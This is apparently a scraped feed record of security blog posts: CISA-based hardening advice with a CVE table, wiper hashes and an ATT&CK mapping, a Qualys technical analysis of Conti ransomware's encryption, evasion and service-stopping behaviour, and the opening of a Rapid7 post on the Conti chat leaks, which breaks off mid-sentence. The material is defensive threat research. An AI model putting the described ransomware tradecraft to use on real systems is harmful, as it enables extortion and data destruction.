Vulnerabilities (CPUOCT2020)| 10/21/2020| 9.8 \nCVE-2021-26855, CVE-2021- 26857 CVE-2021-26858, CVE-2021-27065 | 50107| Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)| 3/3/2021| 9.8 \n \nSee the full list of [CISA known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n#### Remediate CISA recommended catalog of exploited vulnerabilities \n\nFor all CISA cataloged vulnerabilities known to be exploited by Russian state-sponsored actors, [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) customers can create a patch and configuration fix jobs to remediate the risk of all vulnerabilities directly from the VMDR console. Qualys Patch Management maps \u201cCISA Exploited\u201d vulnerabilities detected in the environment to the relevant patches required to remediate those vulnerabilities by downloading the patches without needing to go through the VPN. Customers may use Zero Touch patching to automate the process and ensure all CISA exploited vulnerabilities are automatically fixed including the new vulnerabilities added to the CISA catalog in the future. \n\n\n\n#### Monitor and ensure your software are always up to date\n\nImmediately know all end-of-support critical components across your environment, including open-source software. Qualys CSAM tracks lifecycle stages and corresponding support status, to help organizations manage their technical debt and to reduce the risk of not receiving security patches from the vendor. Security and IT teams can work together to plan upgrades ahead of time by knowing upcoming end-of-life &amp; end-of-support dates.\n\n\n\nUse the \u201cPrioritize Report\u201d function in Qualys Patch Management to map software in your environment to the security risk opposed. Prioritize your remediation efforts based on software that introduces the most risk. Use this report to create automated patch jobs to ensure that the riskiest software is always up to date. Alternatively, deploy individual patches for the riskiest software. \n\n\n\n### Step 3: Protect Your Cloud Services and Office 365\n\nAs noted by CISA, misconfiguration of cloud services and SaaS applications like Office 365 are the primary attack vector for breaches.\n\n#### Detect and Remediate Public Cloud Infrastructure Misconfigurations****\n\nProtect your public cloud infrastructure by securing the following services on priority:\n\n * **IAM**: Ensure all users are MFA enabled and rotate all access keys older than 30 days. Verify that all service accounts are valid (i.e. in use) and have the minimum privilege.\n * **Audit Logs**: Turn on access logging for all cloud management events and for critical services (e.g. S3, RDS, etc.)\n * **Public-facing assets**: Validate that the firewall rules for public-facing assets allow only the needed ports. Pay special attention to RDP access. Place any system with an open RDP port behind a firewall and require users to use a VPN to access it through the firewall.\n\n Automatically detect and remediate cloud misconfigurations using [Qualys CloudView](<https://www.qualys.com/apps/cloud-security-assessment/>).\n\n\n\n#### Protect your Office 365 and Other SaaS Services****\n\nEnforce multi-factor authentication on all accounts with access to Office 365 tenants. At a minimum, enable MFA for accounts with different admin access rights to the tenant. [Qualys SaaSDR](<https://www.qualys.com/apps/saas-detection-response/>) lists all such accounts on which MFA is disabled. Further, Qualys SaaSDR enables continuous security posture assessment of Office 365 via the CIS (Center for Internet Security) certified policy for Office, along with automated security configuration assessment for Zoom, Salesforce, and Google Workspace. This is based on an analysis of all security weaknesses, critical vulnerabilities, and exploits leveraged by attackers in historical attacks as well as security assessments based on the MITRE ATT&amp;CK framework.\n\n\n\n### Step 4: Continuously Detect any Potential Threats and Attacks \n\nMonitor for increases in suspicious and malicious activities as well as anomalous behavior on all endpoints. With Qualys Multi-Vector EDR, customers can detect Indicators of Compromise (IOC) and MITRE ATT&amp;CK Tactics &amp; Techniques provided by CISA and respond quickly to mitigate the risk by capturing process, file, and network events on the endpoint and correlating them with the latest Threat Intelligence, including new and upcoming Indicators of Compromise (IOC) constantly added by the Qualys Research Team. Anomalous endpoint behavior is detected and identified as MITRE ATT&amp;CK Tactics and Techniques.\n\n\n\nThe Appendix at the bottom of this post contains a list of Indicators of Compromise (IOC) and MITRE ATT&amp;CK Tactics &amp; Techniques being utilized.\n\n## Take Action to Learn More about How to Strengthen Your Defenses\n\nWe encourage you to learn more about how to strengthen your defenses consistent with CISA Shields Up guidelines using Qualys Cloud Platform. Join our webinar, [How to Meet CISA Shields Up Guidelines for Cyberattack Protection](<https://event.on24.com/wcc/r/3684128/0F6FB4010D39461FD4209A3E4EB8E9CD>), on March 3, 2022.\n\nQualys recommends that all organizations, regardless of size, heighten their security posture based on the above actionable steps, to protect critical cyber infrastructure from potential state-sponsored, advanced cyberattacks. Qualys Cloud Platform remains continuously committed to high standards of security and compliance to safeguard customer data. In this amplified threat environment, the entire Qualys team is available to help our customers improve cybersecurity and resilience.\n\n* * *\n\n****Implement CISA\u2019s Shields Up Guidance****\n\n[Try it Now](<https://www.qualys.com/forms/cisa-shields-up-service/>)\n\n* * *\n\n### **Appendix:**\n\n#### CISA catalog of known exploited vulnerabilities by state attackers\n\n**CVE**| **QID**| **Title**| **Release Date**| **CVSS_V3** \n---|---|---|---|--- \nCVE-2018-13379| 43702| Fortinet Fortigate (FortiOS) System File Leak through Secure Sockets Layer (SSL) Virtual Private Network (VPN) via Specially Crafted Hypertext Transfer Protocol (HTTP) Resource Requests (FG-IR-18-384)| 9/12/2019| 9.8 \nCVE-2019-1653| 13405| Cisco Small Business RV320 and RV325 Router Multiple Security Vulnerabilities| 1/29/2019| 7.5 \nCVE-2019-2725| 87386| Oracle WebLogic Server Remote Code Execution Vulnerability (Oracle Security Alert Advisory - CVE-2019-2725)| 4/27/2019| 9.8 \nCVE-2019-7609| 371687| Kibana Multiple Security Vulnerabilities (ESA-2019-01,ESA-2019-02,ESA-2019-03)| 4/18/2019| 10 \nCVE-2019-9670| 375990| Zimbra XML External Entity Injection (XXE) Vulnerability| 8/12/2021| 9.8 \nCVE-2019-10149| 50092| Exim Remote Command Execution Vulnerability| 6/5/2019| 9.8 \nCVE-2019-11510| 38771| Pulse Connect Secure Multiple Security Vulnerabilities (SA44101)| 8/6/2019| 10 \nCVE-2019-19781| 372305| Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability(CTX267027)| 12/23/2019| 9.8 \nCVE-2020-0688| 50098| Microsoft Exchange Server Security Update for February 2020| 2/12/2020| 9.8 \nCVE-2020-4006| 13215| VMware Workspace One Access Command Injection Vulnerability (VMSA-2020-0027)| 12/7/2020| 9.1 \nCVE-2020-5902| 38791| F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)| 7/5/2020| 9.8 \nCVE-2020-14882| 87431| Oracle WebLogic Server Multiple Vulnerabilities (CPUOCT2020)| 10/21/2020| 9.8 \nCVE-2021-26855, CVE-2021- 26857 CVE-2021-26858, CVE-2021-27065 | 50107| Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)| 3/3/2021| 9.8 \n \nSee the full list of [CISA known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n#### List of IOCs related to Hermetic Wiper aka KillDisk\n\n**SHA256 Hashes** \n--- \n0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da \n06086c1da4590dcc7f1e10a6be3431e1166286a9e7761f2de9de79d7fda9c397 \n095c7fa99dbc1ed7a3422a52cc61044ae4a25f7f5e998cc53de623f49da5da43 \n0db5e5b68dc4b8089197de9c1e345056f45c006b7b487f7d8d57b49ae385bad0 \n1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591 \n2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf5bf \n34ca75a8c190f20b8a7596afeb255f2228cb2467bd210b2637965b61ac7ea907 \n3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b1767 \n4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382 \n7e154d5be14560b8b2c16969effdb8417559758711b05615513d1c84e56be076 \n923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6 \n9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d \na196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92 \nb01e0c6ac0b8bcde145ab7b68cf246deea9402fa7ea3aede7105f7051fe240c1 \nb60c0c04badc8c5defab653c581d57505b3455817b57ee70af74311fa0b65e22 \nb6f2e008967c5527337448d768f2332d14b92de22a1279fd4d91000bb3d4a0fd \nc2d06ad0211c24f36978fe34d25b0018ffc0f22b0c74fd1f915c608bf2cfad15 \nd4e97a18be820a1a3af639c9bca21c5f85a3f49a37275b37fd012faeffcb7c4a \ndcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78 \ne5f3ef69a534260e899a36cec459440dc572388defd8f1d98760d31c700f42d5 \nf50ee030224bf617ba71d88422c25d7e489571bc1aba9e65dc122a45122c9321 \nfd7eacc2f87aceac865b0aa97a50503d44b799f27737e009f91f3c281233c17d \n \n#### List of MITRE ATT&amp;CK TIDs provided by CISA\n\n**Tactic**| **Technique******| **Procedure****** \n---|---|--- \nReconnaissance [[TA0043](<https://attack.mitre.org/versions/v10/tactics/TA0043/>)]| Active Scanning: Vulnerability Scanning [[T1595.002](<https://attack.mitre.org/versions/v10/techniques/T1595/002/>)]| \nRussian state-sponsored APT actors have performed large-scale scans in an attempt to find vulnerable servers. \nPhishing for Information [[T1598](<https://attack.mitre.org/versions/v10/techniques/T1598>)]| Russian state-sponsored APT actors have conducted spearphishing campaigns to gain credentials of target networks. \nResource Development [[TA0042]](<https://attack.mitre.org/versions/v10/tactics/TA0042/>)| Develop Capabilities: Malware [[T1587.001](<https://attack.mitre.org/versions/v10/techniques/T1587/001>)]| Russian state-sponsored APT actors have developed and deployed malware, including ICS-focused destructive malware. \nInitial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]| Exploit Public Facing Applications [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)]| Russian state-sponsored APT actors use publicly known vulnerabilities, as well as zero-days, in internet-facing systems to gain access to networks. \nSupply Chain Compromise: Compromise Software Supply Chain [[T1195.002](<https://attack.mitre.org/versions/v10/techniques/T1195/002>)]| Russian state-sponsored APT actors have gained initial access to victim organizations by compromising trusted third-party software. Notable incidents include M.E.Doc accounting software and SolarWinds Orion. \nExecution [[TA0002](<https://attack.mitre.org/versions/v10/tactics/TA0002>)]| Command and Scripting Interpreter: PowerShell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)] and Windows Command Shell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)]| Russian state-sponsored APT actors have used `cmd.exe` to execute commands on remote machines. They have also used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and to execute other commands. \nPersistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003>)]| Valid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)]| Russian state-sponsored APT actors have used credentials of existing accounts to maintain persistent, long-term access to compromised networks. \nCredential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006>)]| Brute Force: Password Guessing [[T1110.001](<https://attack.mitre.org/versions/v10/techniques/T1110/001>)] and Password Spraying [[T1110.003](<https://attack.mitre.org/versions/v10/techniques/T1110/003>)]| Russian state-sponsored APT actors have conducted brute-force password guessing and password spraying campaigns. \nOS Credential Dumping: NTDS [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)]| Russian state-sponsored APT actors have exfiltrated credentials and exported copies of the Active Directory database `ntds.dit`. \nSteal or Forge Kerberos Tickets: Kerberoasting [[T1558.003](<https://attack.mitre.org/versions/v10/techniques/T1558/003/>)]| Russian state-sponsored APT actors have performed \u201cKerberoasting,\u201d whereby they obtained the Ticket Granting Service (TGS) Tickets for Active Directory Service Principal Names (SPN) for offline cracking. \nCredentials from Password Stores [[T1555](<https://attack.mitre.org/versions/v10/techniques/T1555>)]| Russian state-sponsored APT actors have used previously compromised account credentials to attempt to access Group Managed Service Account (gMSA) passwords. \nExploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v10/techniques/T1212>)]| Russian state-sponsored APT actors have exploited Windows Netlogon vulnerability [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) to obtain access to Windows Active Directory servers. \nUnsecured Credentials: Private Keys [[T1552.004](<https://attack.mitre.org/versions/v10/techniques/T1552/004>)]| Russian state-sponsored APT actors have obtained private encryption keys from the Active Directory Federation Services (ADFS) container to decrypt corresponding SAML signing certificates. \nCommand and Control [[TA0011](<https://attack.mitre.org/versions/v10/tactics/TA0011/>)]| Proxy: Multi-hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)]| Russian state-sponsored APT actors have used virtual private servers (VPSs) to route traffic to targets. The actors often use VPSs with IP addresses in the home country of the victim to hide activity among legitimate user traffic.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-26T20:20:32", "type": "qualysblog", "title": "Russia-Ukraine Crisis: How to Strengthen Your Security Posture to Protect against Cyber Attack, based on CISA Guidelines", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-1472", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-02-26T20:20:32", "id": "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-18T18:37:13", "description": "Conti is a sophisticated Ransomware-as-a-Service (RaaS) model first detected in December 2019. Since its inception, its use has grown rapidly and has even displaced the use of other RaaS tools like Ryuk. The [Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI)](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/22/cisa-fbi-and-nsa-release-joint-cybersecurity-advisory-conti>) issued a warning about Conti in Sept 2021, noting that they had observed it being used in more than 400 cyberattacks globally, though concentrated in North America and Europe.\n\nThe most common initial infection vectors used are spear phishing and RDP (Remote Desktop Protocol) services. Phishing emails work either through malicious attachments, such as Word documents with an embedded macro that can be used to drop/download BazarLoader, Trickbot, IceID trojans, or via social engineering tactics employed to get the victim to provide additional information or access credentials. Following initial access, attackers download and execute a Cobalt Strike beacon DLL to gather information about domain admin accounts. Additionally, threat actors use Kerberos attacks to attempt to get admin hash in order to conduct brute force attacks.\n\nA Conti affiliate recently leaked what has been dubbed the [Conti playbook](<https://www.bleepingcomputer.com/news/security/translated-conti-ransomware-playbook-gives-insight-into-attacks/>). The playbook revealed that Conti actors also exploit vulnerabilities in unpatched assets to escalate privileges and move laterally across a victim\u2019s network. They check for the &quot;PrintNightmare&quot; vulnerability (CVE-2021-34527) in Windows Print spooler service, EternalBlue vulnerability (CVE-2017-0144) in Microsoft Windows Server Message Block, and the &quot;Zerologon&quot; vulnerability (CVE-2020-1472) in Microsoft Active Directory Domain Controller. The playbook has been translated from Russian to English by security researchers and has provided other useful Indicators of Compromise (IoC).\n\nConti actors also use the RouterScan tool to identify router devices in a provided range of IPs and attempt to find logins/passwords from a standard list available with the RouterScan tool. They then install AnyDesk or Atera on the target machine to maintain an open communication channel. Like other ransomware attacks, Conti actors exfiltrate data from victims\u2019 networks to cloud storage services like MEGA and then deploy Conti ransomware. To upload data on cloud storage Conti uses open-source Rclone command-line software. They use a double extortion approach in which they demand a ransom to release the encrypted data or threaten to publicly release it if a ransom is not paid. They may also sell the data to the highest bidder.\n\n### Technical Details:\n\nConti ransomware uses obfuscation. The most notable use is to hide various Windows API calls used by the malware. It is common for some malware to lookup API calls during execution. Initially, it brings import module names then decrypts the API names and gets their addresses.\n\nFig. 1 De-obfuscation of Windows API\n\nConti uses a unique String Decryption Routine that is applied to almost every string text or API name used by the malware as shown in Fig. 2:\n\nFig. 2 String Decryption Routine\n\nAfter getting API addresses, it calls for `CreateMutexA` API with the Mutex Value of &quot;_CONTI_&quot; as shown below in Fig. 3:\n\nFig. 3 Create Mutex\n\nIt deletes Windows Volume Shadow Copies and also resizes shadow storage for drives C to H:\n\nFig. 4 Deletes Windows Volume Shadow Copy\n\nNext, Conti executes commands for stopping potential Windows Services related to antivirus, security, backup, database, and email solutions:\n\nFig. 5 Stop Potential Windows Services\n\nThe table below contains the names of the Windows Services that Conti stopped by calling the code in Fig. 5 in the loop.\n\nMSSQL$BKUPEXEC| MSSQL$SQLEXPRESS| MSSQLFDLauncher$SHAREPOINT \n---|---|--- \nMSSQL$ECWDB2| MSSQL$SYSTEM_BGC| MSSQLFDLauncher$SQL_2008 \nMSSQL$PRACTICEMGT| MSSQL$TPS| MSSQLFDLauncher$SYSTEM_BGC \nMSSQL$PRACTTICEBGC| MSSQL$TPSAMA| MSSQLFDLauncher$TPS \nMSSQL$PROD| MSSQL$VEEAMSQL2008R2| MSSQLFDLauncher$TPSAMA \nMSSQL$PROFXENGAGEMENT| MSSQL$VEEAMSQL2008R2| MSSQLSERVER \nMSSQL$SBSMONITORING| MSSQL$VEEAMSQL2012| MSSQLServerADHelper \nMSSQL$SHAREPOINT| MSSQLFDLauncher| MSSQLServerADHelper100 \nMSSQL$SOPHOS| MSSQLFDLauncher$PROFXENGAGEMENT| MSSQLServerOLAPService \nMSSQL$SQL_2008| MSSQLFDLauncher$SBSMONITORING| MySQL57 \nAcronis VSS Provider| Mfemms| DCAgent \nAcronisAgent| Mfevtp| EhttpSrv \nAcrSch2Svc| MMS| Ekrn \nAntivirus| Mozyprobackup| Enterprise Client Service \nARSM| MsDtsServer| EPSecurityService \nAVP| MsDtsServer100| EPUpdateService \nBackupExecAgentAccelerator| MsDtsServer110| EraserSvc11710 \nBackupExecAgentBrowser| MSExchangeES| EsgShKernel \nBackupExecDeviceMediaService| MSExchangeIS| ESHASRV \nBackupExecJobEngine| MSExchangeMGMT| FA_Scheduler \nBackupExecManagementService| MSExchangeMTA| MSOLAP$TPSAMA \nBackupExecRPCService| MSExchangeSA| McShield \nBackupExecVSSProvider| MSExchangeSRS| McTaskManager \nBedbg| msftesql$PROD| Mfefire \nIISAdmin| MSOLAP$SQL_2008| Klnagent \nIMAP4Svc| MSOLAP$SYSTEM_BGC| MSOLAP$TPS \n \nConti also leverages the Windows Restart Manager to close applications and services that are running in order to make them available for encryption and to maximize the damage:\n\nFig. 6 Unlock files with Windows Restart Manager\n\nIt collects information about drives and drive types present on compromised systems:\n\nFig. 7 Collect Drives Information\n\nAs shown in Fig. 8, Conti uses multi-threaded tactics. It calls `CreateIoCompletionPort` API to create multiple instances of worker threads into memory to wait for data. Once the file listing is completed, it is passed to the worker threads. Utilizing the computing power of multi-core CPUs, the data is quickly encrypted:\n\nFig. 8 Implementation of Multi-threaded Processing Fig. 9 Multiple Threads Perform File Encryption\n\nConti then iterates files on the local system and those on remote SMB network shares to determine what data to encrypt. It looks for folders and drives shared on remote systems using `NetShareEnum` API. If the remote share is accessible, it encrypts the files present in that share:\n\nFig. 10 Getting Info of Remote Shares\n\nIt collects ARP cache information from the local system using the `GetIpNetTable` API. ARP cache information is a list of all the systems with which the computer recently communicated. It checks for &quot;172.&quot;, &quot;192.168.&quot; etc., on the collected IP list. If an IP address is in a different range it skips that system from encryption:\n\nFig. 11 Collect ARP Cache Information\n\nIt uses an AES-256 encryption key per file with a hard-codedRAS-4096 public encryption key. As shown in Fig. 12, the 0x6610 parameter is used while calling the `CryptGenKey` API. 0x6610 is the value of the CALG_AES_256 identifier and is only alg_id:\n\nFig. 12 Create CALG_AES_256 Key\n\nConti has a unique feature that allows attackers to perform file encryption in command line mode:\n\nFig. 13 Command Line Mode of Operation\n\n### Modes of Operation\n\nConti allows 2 command line modes`--encrypt-mode` and `- h`:\n\nFig. 14 Command Line `--encrypt-mode` Mode\n\n`--encrypt-mod` marks which files are encrypted. There are 3 options for its value:`all`, `local`, and `network`. By default, ransomware runs with the `all` parameter:\n\nFig. 15 Command Line `--encrypt-mode` with Value `all`\n\nIn` all`, encryption carried out for - local and network. `network` means that shared resources on the local network will be encrypted:\n\nFig. 16 Command Line `--encrypt-mode` Mode with Value `local` Fig. 17 Command Line `--encrypt-mode` Mode with Value `network`\n\nIn command line `-h` mode, the parameter may contain the name of a file that lists the DNS and NetBIOS addresses of remote servers. The malware will then build a list of folders to ignore during encryption:\n\nFig. 18 Folders Ignored in Encryption\n\nIt skips the following extensions during encryption: .exe, .dll, .sys, .lnk, and .CONTI. It appends the file extension `.CONTI` and creates a ransom note named `CONTI_README.txt` in every folder to notify users about the infection:\n\nFig. 19 __CONTI\u201d Extension Appended to Files\n\n### The Ransom Note:\n\nThe ransom note and the note\u2019s file information are present in the resource of malware files:\n\nFig. 20 Ransom Note Content Fig. 21 Ransom Note Name\n\nIt calls the `LoadResource` API to get ransom note-related information:\n\nFig. 22 Code to Collect Data Related to the Ransom Note\n\nThe ransom note contains 2 email addresses to get in touch with the attackers. The addresses are unique for each victim:\n\nFig. 23 Ransom Note\n\n### IoC:\n \n \n eae876886f19ba384f55778634a35a1d975414e83f22f6111e3e792f706301fe\n\n### TTP Map:\n\nInitial Access| Execution| Persistence| Privilege Escalation| Defense Evasion| Credential Access| Discovery| Lateral Movement| Collection| Command and control| Exfiltration| Impact \n---|---|---|---|---|---|---|---|---|---|---|--- \nValid Accounts (T1078)| Command and Scripting Interpreter: Windows Command Shell (T1059.003)| Valid Accounts (T1078)| Process Injection: Dynamic-link Library Injection (T1055.001)| Obfuscated Files or Information (T1027)| Brute Force (T1110)| System Network Configuration Discovery (T1016)| Remote Services: SMB/Windows Admin Shares (T1021.002)| Archive Collected Data: Archive via Utility (T1560.001)| Remote file copy (T1105)| Exfiltration Over Web Service: Exfiltration to Cloud Storage (T1567.002)| Data Encrypted for Impact (T1486) \nPhishing: Spearphishing Attachment (T1566.001)| Native Application Programming Interface (API)(T1106)| External Remote Services (T1133)| Valid accounts: domain accounts (T1078.002)| Process Injection: Dynamic-link Library Injection (T1055.001)| Steal or Forge Kerberos Tickets: Kerberoasting (T1558.003)| System Network Connections Discovery (T1049)| Taint Shared Content (T1080)| | | | Service Stop (T1489) \nPhishing: Spearphishing Link (T1566.002)| Windows Management Instrumentation (T1047)| Scheduled task/job: scheduled task (T1053.005)| | Deobfuscate/Decode Files or Information (T1140)| OS credential dumping (T1003)| Process Discovery (T1057)| Exploitation of Remote Services (T1210)| | | | Inhibit System Recovery (T1490) \nExploit public-facing application (T1190)| User execution (T1204)| Startup item (T1165)| | Impair defenses: disable or modify tools (T1562.001)| Credentials from password stores (T1555)| File and Directory Discovery (T1083)| Lateral tool transfer (T1570)| | | | \n| Scheduled task/job: scheduled task (T1053.005)| Boot or logon autostart execution: Winlogon Helper DLL (T1547.004)| | | | Network Share Discovery (T1135)| | | | | \n| Command and Scripting Interpreter: PowerShell (T1059.001)| | | | | Remote System Discovery (T1018)| | | | | \n| | | | | | Network Service Scanning (T1046)| | | | | \n| | | | | | Permission groups discovery: domain groups (T1069.002)| | | | | \n| | | | | | System information discovery (T1082)| | | | | \n| | | | | | System owner/user discovery (T1033)| | | | | \n| | | | | | Security software discovery (T1063)| | | | | \n| | | | | | Account Discovery: Local Account (T1087.001)| | | | | \n| | | | | | Permissions Group Discovery: Local Groups (T1069.001)| | | | | \n| | | | | | | | | | | \n \n### Summary\n\nTo defend against threats, Qualys recommends good cyber hygiene practices, and moving to a preventative approach by keeping network configurations, backup, application access, and patching up-to-date.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-18T17:17:56", "type": "qualysblog", "title": "Conti Ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2020-1472", "CVE-2021-34527"], "modified": "2021-11-18T17:17:56", "id": "QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2022-03-09T17:28:27", "description": "\n\n**_UPDATE: _**_As of March 2, 2022, Conti began taking down exposed infrastructure as a result of the chat disclosure. At that time, we assessed that due to their sophisticated capability, deep funding, and quick recovery from exposed infrastructure in November 2021, they remained an active and significant threat. As of March 9, 2022, our threat intelligence team has observed a resumption of normal operations from Conti._\n\nOn February 27, Twitter user [@ContiLeaks](<https://twitter.com/contileaks>) released a trove of chat logs from the ransomware group, Conti \u2013 a sophisticated ransomware group whose manual was publicly [leaked last year](<https://blog.talosintelligence.com/2021/09/Conti-leak-translation.html>). Ahead of the chat log disclosures, Conti pledged their support for the Russian Government following the Russian invasion of Ukraine. However, a number of members sided with Ukraine, causing strife within the organization. Two days later, Conti posted a second message revising their statement to condemn the war and to strike back only if Russian critical infrastructure is targeted.\n\n_Conti announcement of support for Russian government_\n\n_Conti walk-back of their support for Russia_\n\n_@ContiLeaks announcement of the release_\n\nAt the time of the leak, a file titled `1.tgz` was released on the \u201cAnonFiles\u201d website, containing 14 megabytes of chat logs across 393 JSON files. However, some of the messages were encrypted and could not be read, so the information provided is necessarily incomplete. The remaining files contained internal Conti communications, screenshots of tools, and discussions of their exploits and design processes. \n\nOn February 28 and March 1, a bevy of additional files were posted, along with a number of pro-Ukraine tweets. Among both sets of leaked messages, there were a number of usernames and passwords for a variety of accounts. Additionally, user @ContiLeaks shared access details for a number of alleged Conti command and control servers, plus storage servers for stolen files. However, we have not accessed any of the data necessitating access to remote servers or the use of usernames and passwords, and we strongly recommend against doing so. \n\n@ContiLeaks also shared a file that they purport to be the source code for the Conti ransomware but declined to share the password except with \u201ctrusted parties.\u201d @ContiLeaks did, however, name one alleged Conti developer, providing their email address and Github. The scale of the leaked information suggests that the leaker is likely either a very senior member of the group or a coalition of disgruntled Conti affiliates.\n\n## Conti is a business \u2013 and a well-funded one\n\nMuch of the discussion within the chat logs concerns fairly mundane things \u2013 interviewing potential operators of the group, payment for services, out-of-office messages, gossip, and discussions of products. Based on the leaked chats, the Conti interview process actually looks a lot like a standard technical interview, with coding exercises to be performed hosted on public code repositories, salary negotiations, and the status of ongoing products. \n\nIn addition to other financial information related to specific actors, the leaked chats have revealed Conti\u2019s primary Bitcoin address, which contains over **two billion USD** as of February 28, 2022. Moreover, a conversation on April 9, 2021 between \u201cmango\u201d and \u201cjohnyboy77\u201d indicates Russian FSB involvement in some portion of their funding and that the FSB were interested in files from the media outlet Bellingcat on \u201cNavalny\u201d \u2013 an apparent reference to Alexei Navalny, the currently imprisoned opposition leader in Russia.\n\n## Conti development\n\nConti seems to operate much like a software company \u2013 the chat logs disclose concerns with the development of specific features for targets and a particular difficulty in encrypting very large files. The Conti team also attempted to get demos of popular endpoint detection software with the intent to develop their malware to avoid detection.\n\nTwo of the actors, \u201clemur\u201d and \u201cterry\u201d shared phishing templates (included verbatim in Appendix B at the end of this post) to be used against potential targets. Conti gains initial access in many ways, with phishing a popular line of attack due in part to its relatively high efficacy and low cost. Conti often uses phishing emails to establish a presence on targeted networks.\n\nA screenshot of the Conti control panel was also leaked, showing a number of compromised hosts and a breakdown of the operating systems, antiviruses, user rights, and detailed information about the infected assets.\n\n_Conti control panel_\n\nFurther discussions detailed the use of infrastructure against targets, disclosing a number of both known and unknown Conti command and control domains. At the time of this post, only a small number of the previously unknown command and control domains appear to be active. Conversations between two operators, \u201cStern\u201d and \u201cBentley\u201d discuss the use of third parties for malicious documents, favoring certain providers over others. They also discuss logistics for how to deliver ransomware without being detected by dynamic analysis. In a conversation between the two back in June of 2021, Stern discloses that Conti wants to start their own cryptocurrency but does not know who to work with. There is no evidence that anything came of this desire, and Conti continues to use Bitcoin for their ransoms. \n\n## Other groups assert they are strictly business\n\nIn stark contrast to Conti, other groups have made it clear to the public that despite their \u201cbusiness model,\u201d they take no public stance on this crisis. LockBit is remaining aloof from the conflict and made it clear that they intend to operate as usual. Although it is believed that LockBit is a Russian organization, they assert that \u201cwe are all simple and peaceful people, we are all Earthlings,\u201d and \u201cfor us it is just business and we are all apolitical.\u201d Another ransomware group, ALPHV, claims to be 